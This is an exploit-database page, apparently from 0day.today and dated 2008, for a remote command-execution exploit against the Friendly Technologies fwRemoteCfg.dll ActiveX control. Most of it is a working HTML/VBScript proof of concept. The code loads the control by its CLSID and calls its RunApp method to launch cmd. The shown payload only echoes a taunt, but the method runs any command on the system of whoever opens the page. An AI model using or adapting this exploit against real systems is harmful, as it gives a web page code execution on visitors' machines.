[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

Author
spdr
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9250
Category
remote exploits
Date add
27-08-2008
Platform
unsorted
====================================================================
Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit
====================================================================




<!--
In addition to the overflow found in the "Friendly Technologies" dialers ActiveX,
Here is a "remote command execution" exploit.
Its so sad people dont actually Think...

Greetz to Binaryvision
======================
- http://www.binaryvision.org.il/
-- irc.nix.co.il/#binaryvision
--- written by spdr.
-->

<html>
<object classid='clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B' id='lamers' ></object>
<script language='vbscript'>

lamers.RunApp "cmd" ,"cmd /k echo So Simple, So Lame -- Somebody should get fired." ,0 

</script>



#  0day.today [2024-12-25]  #